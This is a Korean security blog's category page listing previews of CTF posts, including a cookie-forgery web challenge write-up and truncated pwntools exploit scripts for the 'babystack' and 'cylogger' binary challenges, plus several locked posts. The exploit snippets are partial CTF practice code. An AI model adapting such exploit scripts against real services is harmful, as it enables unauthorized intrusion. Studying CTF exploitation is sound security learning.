목록Security (202)
cdor1's lab
보호되어 있는 글입니다.
보호되어 있는 글입니다.
noe.systems 사이트에 접속해서 Newbie 카테고리의 Bakery 문제를 보았다. go 버튼을 눌러 문제로 들어오니 Hello! guest라는 문자열을 띄워주고 admin이 아니라면 페이지를 읽을 수 없다는 말을 한다. 쿠키를 이용해서 클라이언트의 정보를 비교하는 것 같다. #쿠키란? 1. 쿠키 (Cookie)- 서버에 접속시 접속한 클라이언트의 정보를 클라이언트에 저장한다.- 이후에 서버로 전송되는 요청에는 쿠키가 가지고 있는 정보가 같이 포함되어서 전송- 크기는 4KB이하- 쿠키는 이름, 값, 유효기간, 도메인, 경로 등으로 구성 클라이언트의 정보를 저장하는 쿠키를 한번 확인해 보자, 크롬 브라우저 추가 프로그램 중 EditThisCookie를 받고 확인해보면 될 것 같다. guest로 저장..
보호되어 있는 글입니다.
보호되어 있는 글입니다.
from pwn import * #s = remote('chall.pwnable.tw', 10205) s = process('./babystack',env={'LD_PRELOAD':'./libc_64.so.6'}) password = '' libc_leak = '' def input_passwd(passwd): s.recvuntil('>> ') s.sendline('1') s.recvuntil('Your passowrd :') s.send(passwd) return s.recvuntil('!') def cp(data): s.recvuntil('>> ') s.sendline('3') s.recvuntil(' :') s.send(data) for i in range(0, 16): for j in range(..
서브취약점(OOB-Out Of Bound) 브포해서 풀었지만 실수로 쉘을 날려보낸 슬픈 스토리가 있는 익스코드이다. from pwn import * #s = process('./cylogger', env={'LD_PRELOAD':'./libc.so.6'}) while True: try: s = remote('10.10.200.203', 10002) def Leave(select, size, data): s.recvuntil('>> ') s.sendline('L') s.recvuntil('>> ') s.sendline(str(select)) if(select == 1): s.recvuntil('Size of Log >>') s.sendline(str(size)) s.sendline(data) def See..
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.